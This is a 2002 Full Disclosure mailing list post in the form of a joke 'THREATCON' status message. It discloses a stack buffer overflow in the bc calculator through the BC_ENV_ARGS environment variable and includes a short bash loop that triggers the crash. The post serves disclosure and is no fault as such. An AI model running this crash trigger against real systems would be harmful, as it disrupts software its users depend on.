Full Disclosure mailing list archives
THREATCON segv until scripts are fixed
From: silvio () big net au (silvio () big net au)
Date: Sun, 29 Sep 2002 22:28:04 -0700
A quick note to say that THREATCON will be inactive until we fix some scripts. It appears that due to a buffer on the stack (env_argv) not having bounds checking, our threatcon evaluation software segv'd --> cat /dev/urandom | bc script echo THREATCON: CAUTIOUSLY MOVING WITH EARS TO THE GROUND foo="";i=0;while [ $i -lt 100 ]; do foo="a $foo"; ((i=$i+1)); done; export BC_ENV_ARGS=$foo; bc apologies for bash specific features above -- Silvio
Current thread:
- THREATCON segv until scripts are fixed silvio () big net au (Sep 29)